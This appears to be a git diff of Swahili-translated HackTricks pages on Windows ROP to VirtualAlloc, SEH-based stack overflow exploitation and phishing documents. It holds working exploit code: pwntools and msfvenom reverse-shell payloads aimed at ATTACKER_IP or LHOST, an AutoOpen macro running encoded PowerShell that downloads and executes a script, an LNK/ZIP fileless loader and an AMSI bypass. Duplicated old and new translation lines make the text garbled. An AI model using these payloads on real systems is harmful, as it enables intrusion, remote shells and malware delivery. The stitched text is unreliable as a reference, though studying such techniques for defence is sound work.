Kwenye Windows za kisasa stack sio executable (DEP/NX). Njia ya kawaida ya bado kuendesha stack-resident shellcode baada ya stack BOF ni kujenga mnyororo wa 64-bit ROP unaoitisha VirtualAlloc (au VirtualProtect) kutoka kwa module Import Address Table (IAT) ili kufanya eneo la stack liwe executable kisha kurudi katika shellcode iliyounganishwa baada ya mnyororo.
Kwenye Windows ya kisasa stack haitekelezwi (DEP/NX). Njia ya kawaida ya kuendesha stack-resident shellcode baada ya stack BOF ni kujenga mnyororo wa 64-bit ROP unaoitisha VirtualAlloc (au VirtualProtect) kutoka module Import Address Table (IAT) ili kufanya eneo la stack liwe executable na kisha kurudi ndani ya shellcode iliyoongezwa baada ya chain.
Key points (Win64 calling convention):
- VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
- RCX = lpAddress → chagua anwani kwenye stack ya sasa (e.g., RSP) ili eneo jipya lililotengwa la RWX ligongane na payload yako
- RDX = dwSize → kubwa vya kutosha kwa chain yako + shellcode (e.g., 0x1000)
- RCX = lpAddress → chagua anwani kwenye stack ya sasa (mf., RSP) ili eneo jipya la RWX lipatekusanyika na payload yako
- RDX = dwSize → kubwa vya kutosha kwa chain + shellcode (mf., 0x1000)
- R8 = flAllocationType = MEM_COMMIT (0x1000)
- R9 = flProtect = PAGE_EXECUTE_READWRITE (0x40)
- Return directly into the shellcode placed right after the chain.
Minimal strategy:
1) Leak a module base (e.g., via a format-string, object pointer, etc.) to compute absolute gadget and IAT addresses under ASLR.
2) Find gadgets to load RCX/RDX/R8/R9 (pop or mov/xor-based sequences) and a call/jmp [VirtualAlloc@IAT]. If you lack direct pop r8/r9, use arithmetic gadgets to synthesize constants (e.g., set r8=0 and repeatedly add r9=0x40 forty times to reach 0x1000).
1) Leak a module base (mf., via a format-string, object pointer, etc.) ili kuhesabu anwani kamili za gadget na IAT chini ya ASLR.
2) Find gadgets to load RCX/RDX/R8/R9 (pop or mov/xor-based sequences) na call/jmp [VirtualAlloc@IAT]. Ikiwa huna direct pop r8/r9, tumia arithmetic gadgets kutengeneza constants (mf., weka r8=0 kisha kuongeza r9=0x40 mara nyingi hadi kufikia 0x1000).
3) Place stage-2 shellcode immediately after the chain.
Example layout (conceptual):
@ -104,12 +104,12 @@ POP_RDX_RET; 0x1000
JMP_SHELLCODE_OR_RET
# ---- stage-2 shellcode (x64) ----
```
Kwa seti ya gadgets iliyo na vikwazo, unaweza kutengeneza thamani za rejista kwa njia isiyo ya moja kwa moja, kwa mfano:
- mov r9, rbx; mov r8, 0; add rsp, 8; ret → iweke r9 kutoka rbx, ifanye r8 kuwa sifuri, na fidia stack kwa qword ya takataka.
- xor rbx, rsp; ret → weka rbx kuwa pointer ya stack ya sasa.
- push rbx; pop rax; mov rcx, rax; ret → hamisha thamani iliyotokana na RSP ndani ya RCX.
Kwa gadget set iliyo na vikwazo, unaweza kutengeneza thamani za rejista kwa njia isiyo ya moja kwa moja, kwa mfano:
- mov r9, rbx; mov r8, 0; add rsp, 8; ret → weka r9 kutoka rbx, weka r8 kwa sifuri, na fidia stack kwa junk qword.
- xor rbx, rsp; ret → kuanzisha rbx kwa stack pointer ya sasa.
- push rbx; pop rax; mov rcx, rax; ret → hamisha thamani inayotokana na RSP ndani ya RCX.
Pwntools sketch (ikiwa base na gadgets vinajulikana):
Pwntools rasimu (ikiwa base na gadgets vinajulikana):
```python
from pwn import *
base = 0x7ff6693b0000
@ -132,26 +132,27 @@ rop += p64(base+POP_RDX_RET) + p64(0x1000)
rop += p64(IAT_VirtualAlloc)
rop += asm(shellcraft.amd64.windows.reverse_tcp("ATTACKER_IP", ATTACKER_PORT))
```
Tips:
- VirtualProtect hufanya kazi kwa njia sawa ikiwa kufanya buffer iliyopo kuwa RX ni kipaumbele; mpangilio wa vigezo ni tofauti.
- Ikiwa nafasi ya stack ni nyembamba, tenga RWX mahali pengine (RCX=NULL) na jmp kwenye eneo jipya badala ya kutumia tena stack.
- Daima zingatia gadgets zinazorudisha RSP (e.g., add rsp, 8; ret) kwa kuingiza junk qwords.
Vidokezo:
- VirtualProtect inafanya kazi kwa njia ile ile ikiwa kuifanya buffer iliyopo RX ni muhimu; mpangilio wa vigezo ni tofauti.
- Ikiwa nafasi ya stack ni nyembamba, tengeneza RWX mahali pengine (RCX=NULL) na jmp kwa eneo jipya badala ya kutumia tena stack.
- Kumbuka daima gadgets ambazo zinabadilisha RSP (e.g., add rsp, 8; ret) kwa kuingiza junk qwords.
- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **inapaswa kuzimwa** ili anwani iwe ya kuaminika kwa utekelezaji tofauti; vinginevyo anwani ambapo function itahifadhiwa haitakuwa ile ile kila wakati na utahitaji leak ili kugundua wapi win function imepakiwa.
- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) **inapaswa pia kuzimwa** au anwani ya kurudi ya EIP itakayodhulumiwa haitawahi kutumika.
- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** ulinzi utaizuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitaweza kutekelezwa.
## Mifano na Marejeo
- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **should be disabled** ili anwani iwe thabiti katika utekelezaji mbalimbali, vinginevyo anwani ambapo function itahifadhiwa haitakuwa daima sawa na utakahitaji leak ili kubaini wapi win function imepakuliwa.
- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) pia zinapaswa kuzimwa, vinginevyo anuani ya EIP iliyoharibika haitafuatiwa kamwe.
- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection ingekuwa ikizuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitaweza kutekelezeka.
## Mifano Mengine & Marejeo
- [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode)
- [https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html)
- 64bit, ASLR na stack address leak, andika shellcode na ruka kwenye hiyo
- 64bit, ASLR na stack address leak, andika shellcode na ruka kwenda kwake
- [https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html)
- 32 bit, ASLR na stack leak, andika shellcode na ruka kwenye hiyo
- 32 bit, ASLR na stack leak, andika shellcode na ruka kwenda kwake
- [https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html)
- 32 bit, ASLR na stack leak, kulinganisha ili kuzuia wito la exit(), funika variable na thamani, andika shellcode na ruka kwenye hiyo
- 32 bit, ASLR na stack leak, kulinganisha ili kuzuia mwito wa exit(), andika juu variable kwa thamani na andika shellcode kisha ruka kwenda kwake
- [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
- arm64, hakuna ASLR, ROP gadget kufanya stack iwe executable na ruka kwa shellcode iliyoko kwenye stack
- arm64, hakuna ASLR, ROP gadget kufanya stack iwe executable na ruka kwenda shellcode ndani ya stack
## Marejeo

68
src/binary-exploitation/stack-overflow/windows-seh-overflow.md
View File

@ -2,24 +2,24 @@
{{#include ../../banners/hacktricks-training.md}}
SEH-based exploitation ni mbinu ya klassiki kwenye Windows x86 inayotumia Structured Exception Handler chain iliyohifadhiwa kwenye stack. Wakati stack buffer overflow inapoandika juu ya uwanja mbili za 4-byte
Utekelezaji wa SEH-based ni mbinu ya kawaida ya x86 Windows inayotumia mnyororo wa Structured Exception Handler uliohifadhiwa kwenye stack. Wakati stack buffer overflow inapobandika juu nywanja mbili za 4-byte
- nSEH: kielekezi kwa rekodi ya SEH inayofuata, na
- SEH: kielekezi kwa function ya exception handler
- nSEH: pointer to the next SEH record, and
- SEH: pointer to the exception handler function
mshambuliaji anaweza kuchukua udhibiti wa utekelezaji kwa:
1) Kuweka SEH kwa address ya POP POP RET gadget kwenye module isiyo na ulinzi (non-protected module), ili wakati exception itakapotumwa gadget irudie kwenye bytes zilizodhibitiwa na mshambuliaji, na
2) Kutumia nSEH kupitisha tena utekelezaji (kwa kawaida short jump) kurudi kwenye buffer kubwa iliyofurika ambapo shellcode iko.
1) Kuweka SEH kwa anwani ya gadget ya POP POP RET katika module isiyo na ulinzi, ili wakati exception itakapotumwa gadget irudie ndani ya bytes zinazo-dhibitiwa na mshambuliaji, na
2) Kutumia nSEH kupeleka tena utekelezaji (kawaida jump fupi) kurudi kwenye buffer kubwa iliyovuja ambapo shellcode inapatikana.
Mbinu hii ni maalum kwa michakato ya 32-bit (x86). Kwenye mifumo ya kisasa, pendelea module isiyo na SafeSEH na ASLR kwa ajili ya gadget. Vinyago vibaya mara nyingi ni pamoja na 0x00, 0x0a, 0x0d (NUL/CR/LF) kutokana na C-strings na HTTP parsing.
Mbinu hii ni maalum kwa michakato ya 32-bit (x86). Katika mifumo ya kisasa, chagua module bila SafeSEH na ASLR kwa ajili ya gadget. Wahusika wabaya mara nyingi ni 0x00, 0x0a, 0x0d (NUL/CR/LF) kutokana na C-strings na HTTP parsing.
---
## Finding exact offsets (nSEH / SEH)
- Sababisha crash kwenye process na kuthibitisha kuwa SEH chain imeandika upya (mf., kwenye x32dbg/x64dbg, angalia SEH view).
- Tuma cyclic pattern kama data inayofurika na hesabu offsets za dword mbili ambazo zinaingia kwenye nSEH na SEH.
- Crash the process and verify the SEH chain is overwritten (e.g., in x32dbg/x64dbg, check the SEH view).
- Send a cyclic pattern as the overflowing data and compute offsets of the two dwords that land in nSEH and SEH.
Example with peda/GEF/pwntools on a 1000-byte POST body:
```bash
@ -33,26 +33,26 @@ python3 -c "from pwn import *; print(cyclic(1000).decode())"
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x41484241 # SEH
# ➜ offsets example: nSEH=660, SEH=664
```
Thibitisha kwa kuweka alama katika nafasi hizo (mfano, nSEH=b"BB", SEH=b"CC"). Hifadhi urefu mzima usibadilike ili kufanya crash iweze kurudiwa.
Thibitisha kwa kuweka alama katika nafasi hizo (e.g., nSEH=b"BB", SEH=b"CC"). Weka urefu mzima usibadilike ili kufanya crash iweze kurudiwa.
---
## Kuchagua POP POP RET (SEH gadget)
Unahitaji mfululizo wa POP POP RET ili kuondoa SEH frame na kurudi ndani ya bytes zako za nSEH. Tafuta katika module isiyo na SafeSEH na ikiwezekana isiyo na ASLR:
Unahitaji mfululizo wa POP POP RET ili kufungua fremu ya SEH na kurudi kwenye bytes zako za nSEH. Iipatie katika module isiyo na SafeSEH na ikiwezekana isiyo na ASLR:
- Mona (Immunity/WinDbg): `!mona modules` kisha `!mona seh -m modulename`.
- x64dbg plugin ERC.Xdbg: `ERC --SEH` ili orodhesha POP POP RET gadgets na hali ya SafeSEH.
- x64dbg plugin ERC.Xdbg: `ERC --SEH` kwa kuorodhesha POP POP RET gadgets na hali ya SafeSEH.
Chagua anwani isiyo na badchars wakati imeandikwa little-endian (mfano, `p32(0x004094D8)`). Toa kipaumbele kwa gadgets ndani ya vulnerable binary ikiwa ulinzi unaruhusu.
Chagua anwani ambayo haina badchars unapoandika little-endian (mfano, `p32(0x004094D8)`). Tendea kipaumbele gadgets ndani ya vulnerable binary ikiwa protections zinaruhusu.
---
## Mbinu ya jump-back (short + near jmp)
## Mbinu ya kuruka-nyuma (short + near jmp)
nSEH ni bytes 4 tu, ambayo inafaa angalau short jump ya 2-byte (`EB xx`) pamoja na padding. Ikiwa lazima uruke nyuma mamia ya bytes kufikia mwanzo wa buffer yako, tumia near jump ya 5-byte iliyowekwa kabla ya nSEH na uiunganishe nayo kwa short jump kutoka nSEH.
nSEH ni 4 bytes tu, ambayo inakidhi angalau short jump ya 2-byte (`EB xx`) pamoja na padding. Ikiwa lazima uruke nyuma mamia ya bytes kufikia mwanzo wa buffer yako, tumia 5-byte near jump iliyowekwa kabla ya nSEH na ui-chain nayo kwa short jump kutoka nSEH.
Kwa nasmshell:
With nasmshell:
```text
nasm> jmp -660 ; too far for short; near jmp is 5 bytes
E967FDFFFF
@ -61,7 +61,7 @@ EBF6
nasm> jmp -652 ; 8 bytes closer (to account for short-jmp hop)
E96FFDFFFF
```
Wazo la mpangilio kwa payload ya 1000-byte yenye nSEH kwenye offset 660:
Wazo la muundo wa payload ya 1000-byte yenye nSEH kwenye offset 660:
```python
buffer_length = 1000
payload = b"\x90"*50 + shellcode # NOP sled + shellcode at buffer start
@ -71,17 +71,17 @@ payload += b"\xEB\xF6" + b"BB" # nSEH: short jmp -8 + 2B pa
payload += p32(0x004094D8) # SEH: POP POP RET (no badchars)
payload += b"D" * (buffer_length - len(payload))
```
Execution flow:
- Exception inatokea, dispatcher anatumia SEH iliyobadilishwa.
- POP POP RET hurejesha mtiririko hadi nSEH yetu.
- nSEH inatekeleza `jmp short -8` kuelekea near jump ya 5-byte.
- Near jump inafika mwanzoni mwa buffer yetu ambapo NOP sled + shellcode ziko.
Mtiririko wa utekelezaji:
- Hitilafu inatokea, dispatcher anatumia SEH iliyobadilishwa.
- POP POP RET inaendelea hadi nSEH yetu.
- nSEH inatekeleza `jmp short -8` kwenye 5-byte near jump.
- Near jump inaelekezwa mwanzoni mwa buffer yetu ambapo NOP sled + shellcode zinakaa.
---
## Herufi mbaya
## Bad characters
Jenga string kamili ya badchar na linganisha memory ya stack baada ya crash, ukiondoa bytes ambazo zimeharibika na parser ya target. Kwa HTTP-based overflows, `\x00\x0a\x0d` karibu daima zimeachwa nje.
Jenga string kamili ya badchar na linganisha kumbukumbu ya stack baada ya crash, ukiondoa bytes ambazo zimeharibika au kubadilishwa na parser ya target. Kwa overflow zinazotegemea HTTP, `\x00\x0a\x0d` karibu daima zinatengwa.
```python
badchars = bytes([x for x in range(1,256)])
payload = b"A"*660 + b"BBBB" + b"CCCC" + badchars # position appropriately for your case
@ -90,21 +90,21 @@ payload = b"A"*660 + b"BBBB" + b"CCCC" + badchars # position appropriately for
## Shellcode generation (x86)
Tumia msfvenom na badchars zako. NOP sled ndogo husaidia kuvumilia utofauti wa eneo la kutua.
Tumia msfvenom na badchars zako. NOP sled ndogo husaidia kuvumilia tofauti za mahali pa kutua.
```bash
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f python -v sc
```
Ikiwa unazitengeneza mara moja, muundo wa hex ni rahisi kuingiza na ku-unhex katika Python:
Ikiwa unazalisha kwa wakati halisi, muundo wa hex ni rahisi kuingiza na ku-unhex katika Python:
```bash
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f hex
```
---
## Kutuma kupitia HTTP (CRLF sahihi + Content-Length)
## Kupeleka kupitia HTTP (CRLF sahihi + Content-Length)
Wakati vector dhaifu ni mwili wa ombi la HTTP, unda ombi ghafi yenye CRLFs sahihi na Content-Length ili server isome mwili mzima uliovuja.
Wakati vektori dhaifu ni HTTP request body, unda raw request yenye CRLFs sahihi na Content-Length ili server isome kikamilifu body yote inayozidi.
```python
# pip install pwntools
from pwn import remote
@ -127,21 +127,21 @@ p.close()
## Zana
- x32dbg/x64dbg kutazama mnyororo wa SEH na kutathmini crash.
- x32dbg/x64dbg ili kuona mnyororo wa SEH na kufanya triage ya crash.
- ERC.Xdbg (x64dbg plugin) kuorodhesha SEH gadgets: `ERC --SEH`.
- Mona kama mbadala: `!mona modules`, `!mona seh`.
- nasmshell kutengeneza short/near jumps na kunakili raw opcodes.
- pwntools kutengeneza payloads sahihi za mtandao.
- nasmshell kuassemble short/near jumps na kunakili raw opcodes.
- pwntools kutengeneza precise network payloads.
---
## Vidokezo na tahadhari
- Inatumika tu kwa michakato ya x86. x64 inatumia mpangilio tofauti wa SEH na SEH-based exploitation kwa ujumla haiwezi kutumika.
- Pendelea gadgets katika modules bila SafeSEH na ASLR; vinginevyo, tafuta module isiyo na ulinzi iliyopakiwa kwenye mchakato.
- Watchdog za huduma zinazorestart moja kwa moja baada ya crash zinaweza kufanya iterative exploit development iwe rahisi.
- Inatumika tu kwa processes za x86. x64 inatumia SEH scheme tofauti na SEH-based exploitation kwa ujumla si viable.
- Pendelea gadgets zilizomo kwenye modules zisizo na SafeSEH na ASLR; vinginevyo, tafuta module isiyo na ulinzi iliyopakiwa kwenye process.
- Service watchdogs zinazorestart kiotomatiki baada ya crash zinaweza kurahisisha iterative exploit development.
## References
## Marejeo
- [HTB: Rainbow SEH overflow to RCE over HTTP (0xdf)](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)
- [ERC.Xdbg Exploit Research Plugin for x64dbg (SEH search)](https://github.com/Andy53/ERC.Xdbg)
- [Corelan Exploit writing tutorial part 7 (SEH)](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-7-unicode-0day-buffer-overflow-seh-and-venetian-shellcode/)

78
src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
View File

@ -1,40 +1,40 @@
# Faili na Nyaraka za Phishing
# Phishing Faili & Nyaraka
{{#include ../../banners/hacktricks-training.md}}
## Nyaraka za Office
Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiki wa data hufanywa kwa njia ya utambuzi wa muundo wa data, kwa mujibu wa kiwango cha OfficeOpenXML. Ikiwa kosa lolote litatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Microsoft Word hufanya uthibitishaji wa data za faili kabla ya kufungua faili. Uthibitishaji wa data hufanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Kama hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Kwa kawaida, faili za Word zinazobeba macros hutumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wake wa kutekeleza macros.\
Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
Mifumo ya ndani na taratibu sawa zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.).
Kawaida, Word files containing macros use the `.docm` extension. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha nyongeza ya faili na bado kuhifadhi uwezo wao wa kutekeleza macro.\
Kwa mfano, faili ya RTF kwa kawaida haisaidii macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macro.\
Miundo na mekanisimu za ndani zile zile zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
Unaweza kutumia amri ifuatayo kuangalia ni zipi extensions zitakazotekelezwa na baadhi ya programu za Office:
Unaweza kutumia amri ifuatayo kuchunguza ni nyongeza zipi zitakazotekelezwa na programu fulani za Office:
```bash
assoc | findstr /i "word excel powerp"
```
Faili za DOCX zinazorejelea template ya mbali (File Options Add-ins Manage: Templates Go) ambazo zinajumuisha macros zinaweza pia “kutekeleza” macros.
Faili za DOCX zinazorejelea kiolezo cha mbali (File Options Add-ins Manage: Templates Go) kinachojumuisha macros zinaweza pia “kutekeleza” macros.
### Kupakia Picha za Nje
### Kupakia Picha ya Nje
Nenda kwa: _Insert --> Quick Parts --> Field_\
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://<ip>/whatever
_**Jamii**: Links and References, **Majina ya field**: includePicture, na **Jina la Faili au URL**:_ http://<ip>/whatever
![](<../../images/image (155).png>)
### Macros Backdoor
Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye document.
Inawezekana kutumia macros kuendesha msimbo wa aina yoyote kutoka kwa hati.
#### Autoload functions
Kadri zinavyokuwa za kawaida zaidi, ndivyo AV inavyoweza kuzitambua.
Kadiri zinavyozidi kuwa za kawaida, ndivyo AV inavyoweza kuzitambua.
- AutoOpen()
- Document_Open()
#### Macros Code Examples
#### Mifano ya msimbo ya Macros
```vba
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
@ -64,16 +64,16 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
```
#### Ondoa metadata kwa mkono
#### Ondoa metadata kwa mikono
Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itaonyesha Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
#### Extension ya Doc
#### Upanuzi wa Doc
Ukimaliza, chagua dropdown ya **Save as type**, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\
Fanya hivyo kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **stigma** kuhusu ugani unaowezesha macro **`.docm`** (kwa mfano, icon ya thumbnail ina `!` kubwa na baadhi ya gateway za wavuti/baruapepe huvizuia kabisa). Kwa hiyo, **ugani wa kale `.doc` ndio suluhisho bora**.
Wakati umemaliza, chagua dropdown ya **Save as type**, badilisha fomati kutoka **`.docx`** kuwa **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu huwezi kuhifadhi macros ndani ya **`.docx`** na kuna stigma kuhusiana na extension ya macro-enabled **`.docm`** (mf., ikoni ya thumbnail ina `!` kubwa na baadhi ya web/email gateway huziweka block kabisa). Kwa hivyo, extension ya legacy **`.doc`** ni suluhisho bora.
#### Vyanzo vya Malicious Macros
#### Vizalishaji vya Macros Hatari
- MacOS
- [**macphish**](https://github.com/cldrn/macphish)
@ -81,9 +81,9 @@ Fanya hivyo kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **s
## Faili za HTA
HTA ni programu ya Windows inayochanganya **HTML na lugha za scripting (k.m. VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inaendeshwa kama programu "iliyothibitishwa kabisa", bila vikwazo vya mfano wa usalama wa kivinjari.
HTA ni programu ya Windows inayochanganya **HTML na scripting languages (such as VBScript and JScript)**. Inatengeneza interface ya mtumiaji na inaendeshwa kama programu "fully trusted", bila vizingiti vya modeli ya usalama ya browser.
HTA inaenzishwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imesakinishwa** pamoja na **Internet Explorer**, na kufanya **`mshta` inategemea IE**. Kwa hivyo ikiwa imeondolewa, HTA hazitaweza kutekelezwa.
HTA inaendeshwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imewekwa** pamoja na **Internet Explorer**, na hivyo **`mshta` inategemea IE**. Hivyo ikiwa imeondolewa, HTA haziwezi kuendeshwa.
```html
<--! Basic HTA Execution -->
<html>
@ -140,9 +140,9 @@ self.close
```
## Kulazimisha NTLM Authentication
Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atazifungua (hata HTTP MitM?). Au mtumie mwathiriwa **anwani ya faili** zitakazowasababisha **authentication** tu kwa **ufunguaji wa folda.**
Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atafikia (hata HTTP MitM?). Au tuma mwathiriwa **anwani ya mafaili** ambayo itatazua **authentication** tu kwa **kufungua folda.**
**Tazama mawazo haya na zaidi kwenye kurasa zifuatazo:**
**Angalia mawazo haya na mengine kwenye kurasa zifuatazo:**
{{#ref}}
@ -156,24 +156,24 @@ Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano,
### NTLM Relay
Usisahau kwamba huwezi kuiba tu hash au authentication pekee, bali pia unaweza **perform NTLM relay attacks**:
Usisahau kuwa hutaweza tu kuiba hash au authentication lakini pia **kutekeleza NTLM relay attacks**:
- [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
- [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha nyaraka mbili halali za kupotosha (PDF/DOCX) na .lnk hatari. Mbinu ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya bytes ghafi za ZIP baada ya alama ya kipekee, na .lnk huitaibua na kuiendesha kabisa kwenye kumbukumbu.
Kampeni zenye ufanisi mkubwa huzalisha ZIP inayojumuisha nyaraka mbili halali za kuibua (PDF/DOCX) na .lnk hatarishi. Njia ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya raw bytes za ZIP baada ya alama ya kipekee, na .lnk inachonga na kuendesha yote ndani ya kumbukumbu.
Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
1) Tambua ZIP ya asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na folda mzazi ya current working directory.
2) Soma bytes za ZIP na utafute marker uliowekwa kwenye msimbo (mfano, xFIQCV). Yote yanayofuata marker ni PowerShell payload iliyojazwa ndani.
3) Nakili ZIP hadi %ProgramData%, itolee hapo (extract), kisha fungua .docx ya kupotosha ili ionekane halali.
4) Bypass AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate hatua inayofuata (kwa mfano, ondoa tabia zote za #) na uitekeleze kwenye kumbukumbu.
1) Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na mzazi wa current working directory.
2) Soma bytes za ZIP na tafuta marker iliyowekwa kimagurudumu (mfano, xFIQCV). Kila kitu baada ya marker ni PowerShell payload iliyowekwa.
3) Nakili ZIP hadi %ProgramData%, ifungue hapo, na fungua decoy .docx ili ionekane halali.
4) Kuepuka AMSI kwa mchakato wa sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate hatua inayofuata (mfano, ondoa herufi zote #) na itekeleze ndani ya kumbukumbu.
Mfano wa skeleton ya PowerShell ili kuibua na kuendesha hatua iliyojazwa ndani:
Mfano wa skeleton ya PowerShell ili kuchonga na kuendesha hatua iliyowekwa:
```powershell
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
@ -190,22 +190,22 @@ $code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code
```
Notes
- Usambazaji mara nyingi unatumia vibamba vya subdomain vya PaaS vinavyoaminika (e.g., *.herokuapp.com) na unaweza gate payloads (kutumia ZIP zisizo hatari kulingana na IP/UA).
- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuiendesha kupitia Reflection.Emit + VirtualAlloc ili kupunguza athari za diski.
Vidokezo
- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA).
- Sehemu inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza artifacts za diski.
Persistence used in the same chain
- COM TypeLib hijacking of the Microsoft Web Browser control ili IE/Explorer au programu yoyote inayoiingiza ianze upya payload kiotomatiki. See details and ready-to-use commands here:
Persistence iliyotumika katika mnyororo huo huo
- COM TypeLib hijacking ya Microsoft Web Browser control ili IE/Explorer au app yoyote inayoi-embed irejeshe payload moja kwa moja. See details and ready-to-use commands here:
{{#ref}}
